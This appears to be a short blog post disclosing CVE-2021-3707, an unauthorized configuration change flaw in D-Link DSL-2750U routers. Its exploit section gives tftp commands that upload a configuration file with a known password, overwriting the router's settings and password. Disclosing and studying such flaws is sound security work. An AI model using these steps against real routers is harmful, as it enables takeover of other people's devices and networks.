CVE-2021-3707 D-Link DSL-2750U Router Unauthorized Configuration Modification Vulnerability

Introduction

D-Link DSL-2750U router with firmware vME1.16 or prior versions is vulnerable to unauthorized configuration modification.

Exploit

Export configuration file from a DSL-2750U router whose password is known.

Connect to the tftp server on router whose password is not known and send the configuration file containing known password.

tftp 192.168.1.1
binary
put cfg.xml

All configuration, including the password of the router will be changed to that in uploaded configuration file.



Video



Comments

Popular posts from this blog

Extract / Create Cramfs File System from Ubuntu 20.04

Firmadyne Installation & Emulation of Firmware

Dump memory to file from U-Boot console using Memory Display (md) log